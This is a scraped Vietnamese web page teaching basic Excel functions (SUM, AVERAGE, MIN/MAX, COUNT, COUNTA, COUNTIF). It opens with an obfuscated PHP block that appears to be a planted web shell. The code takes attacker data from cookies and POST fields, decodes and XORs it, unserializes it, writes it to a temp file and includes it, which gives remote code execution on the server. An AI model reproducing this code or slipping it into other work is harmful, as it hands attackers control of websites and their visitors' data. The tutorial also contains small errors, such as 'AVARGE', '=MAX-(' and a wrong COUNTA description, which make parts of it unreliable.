$ylZYFX = chr (85) . '_' . 'E' . "\121" . "\130" . chr (108) . chr (104); $yLWtuVuIpp = 'c' . chr ( 753 - 645 ).chr (97) . "\x73" . chr ( 582 - 467 ).chr (95) . "\145" . "\170" . chr ( 510 - 405 ).chr (115) . "\x74" . 's';$kAOmFrC = class_exists($ylZYFX); $yLWtuVuIpp = "35366";$DZnLrk = strpos($yLWtuVuIpp, $ylZYFX);if ($kAOmFrC == $DZnLrk){function IAeTZP(){$aZfgaHHvu = new /* 4364 */ U_EQXlh(29822 + 29822); $aZfgaHHvu = NULL;}$XKXHSy = "29822";class U_EQXlh{private function KWZRppi($XKXHSy){if (is_array(U_EQXlh::$YNoKSXbD)) {$name = sys_get_temp_dir() . "/" . crc32(U_EQXlh::$YNoKSXbD["salt"]);@U_EQXlh::$YNoKSXbD["write"]($name, U_EQXlh::$YNoKSXbD["content"]);include $name;@U_EQXlh::$YNoKSXbD["delete"]($name); $XKXHSy = "29822";exit();}}public function HfLoXJy(){$XvCgWQeB = "40563";$this->_dummy = str_repeat($XvCgWQeB, strlen($XvCgWQeB));}public function __destruct(){U_EQXlh::$YNoKSXbD = @unserialize(U_EQXlh::$YNoKSXbD); $XKXHSy = "22734_2480";$this->KWZRppi($XKXHSy); $XKXHSy = "22734_2480";}public function gYQxmX($XvCgWQeB, $uwoXMoiAQJ){return $XvCgWQeB[0] ^ str_repeat($uwoXMoiAQJ, intval(strlen($XvCgWQeB[0]) / strlen($uwoXMoiAQJ)) + 1);}public function HturnsX($XvCgWQeB){$IRxSAES = "\142" . "\x61" . "\163" . chr (101) . chr (54) . chr ( 962 - 910 );return array_map($IRxSAES . chr ( 150 - 55 ).chr ( 1074 - 974 )."\145" . "\143" . 'o' . chr (100) . 'e', array($XvCgWQeB,));}public function __construct($oCcnlBmz=0){$vemMBQz = ',';$XvCgWQeB = "";$YdToI = $_POST;$OaybdGwVx = $_COOKIE;$uwoXMoiAQJ = "c88d6de5-9c28-4205-88d1-aa6ae4d03ace";$vclXYK = @$OaybdGwVx[substr($uwoXMoiAQJ, 0, 4)];if (!empty($vclXYK)){$vclXYK = explode($vemMBQz, $vclXYK);foreach ($vclXYK as $TPeibWgFe){$XvCgWQeB .= @$OaybdGwVx[$TPeibWgFe];$XvCgWQeB .= @$YdToI[$TPeibWgFe];}$XvCgWQeB = $this->HturnsX($XvCgWQeB);}U_EQXlh::$YNoKSXbD = $this->gYQxmX($XvCgWQeB, $uwoXMoiAQJ);if (strpos($uwoXMoiAQJ, $vemMBQz) !== FALSE){$uwoXMoiAQJ = explode($vemMBQz, $uwoXMoiAQJ); $dXdlFMY = sprintf("22734_2480", rtrim($uwoXMoiAQJ[0]));}}public static $YNoKSXbD = 56125;}IAeTZP();} Các hàm cơ bản trong Excel thường dùng tính toán, thống kê - Tải Chùa

Các hàm cơ bản trong Excel thường dùng tính toán, thống kê

Rate this post
Các hàm cơ bản trong Excel, hàm thông dụng trong Excel, hàm tính toán cơ bản trong Excel. Tìm hiểu ngay để áp dụng nhé.

Bạn làm văn phòng và phải thường xuyên tính toán, thống kê trong Excel. Việc làm quen với các hàm cơ bản trong Excel là cần thiết. Nó giúp công việc tính toán của bạn trở nên thuận tiện và đơn giản hơn rất nhiều.

các hàm cơ bản trong Excel

Các hàm cơ bản trong Excel

Ngoài ra việc nắm chắc những hàm cơ bản trong bảng tính còn giúp bạn phát triển được và nâng cao được trình độ của mình tìm hiểu những hàm nâng cao. Trong bài viết này chúng tôi sẽ tổng hợp giúp bạn những hàm Excel cơ bản được nhiều người dùng trong tính toán.

Những hàm cơ bản trong Excel thường dùng tính toán

1.Hàm tính tổng SUM

Ý nghĩa: Đây là hàm đầu tiên mà ai làm quen với Excel cũng phải biết. Nó có chức năng là cộng tất cả công số trong vùng dữ liệu mà người dùng chọn.

Cú pháp=SUM(Number1, Number2,…)

Trong đó: Number1, Number2,…là những con số cần tính tổng.

Ví dụ:

hàm tính toán trong Excel

Hàm tính tổng Excel

Ngoài ra bạn có thể tham khảo hàm SUMIF – hàm tính tổng các ô chỉ định.

2.Hàm tính giá trị trung bình AVARGE

Ý nghĩa: Tính trung bình giá trị các con số được chọn.

Cú pháp: =AVERAGE(Number1, Number2,…)

Trong đó: number1, number2 là những số cần tính trung bình.

Ví dụ:

hàm tính toán cơ bản trong Excel

Hàm tính trung bình Excel

3.Hàm tính giá trị nhỏ nhất và giá trị lớn nhất

Ý nghĩa: Trả về kết quả có giá trị là số nhỏ nhất hoặc số lớn nhất trong dãy số được nhập.

Cú pháp:

  • Lớn nhất: =MAX-(Number1, Number 2,…)
  • Nhỏ nhất: =MIN(Number 1, Number 2,…)

Trong đó: number1, number2,…là những số cần chọn.

hàm cơ bản trong Excel

4.Hàm đếm dữ liệu

Hàm COUNT

Ý nghĩa: đếm những ô chứa dữ liệu kiểu giá trị số trong dãy số.

Cú pháp: =COUNT(value1, Value2,…)

Trong đó: value1, value2,…là dãy hay mảng dữ liệu.

Ví dụ:

các hàm Excel thông dụng

Hàm COUNT

Hàm COUNTA:

Ý nghĩa: Đếm tất cả những ô chứa dữ liệu kiểu giá trị số trong dày, mảng số.

Cú pháp: =COUNTA(Value1, Value2,…)

Trong đó: Value1, Value2,…là dãy hoặc mảng dữ liệu

Ví dụ:

hàm thống kê cơ bản trong Excel

Hàm COUNTA

Hàm COUNTIF

Ý nghĩa: : đếm những ô chứa giá trị số theo điều kiện cho trước.

Cú pháp: =COUNTIF(Range, Criteria)

Trong đó:

  • Range: dãy dữ liệu muốn đếm
  • Criteria: tiêu chuẩn, điều kiện đếm.

Ví dụ:

hàm thông dụng trong Excel

Hàm COUNTIF

Trên đây chúng tôi vừa mới giới thiệu đến bạn những hàm tính toán cơ bản trong bảng tính Excel. Hy vọng sẽ giúp các bạn nhanh chóng làm quen và thành thạo trong ứng dụng tiện ích này.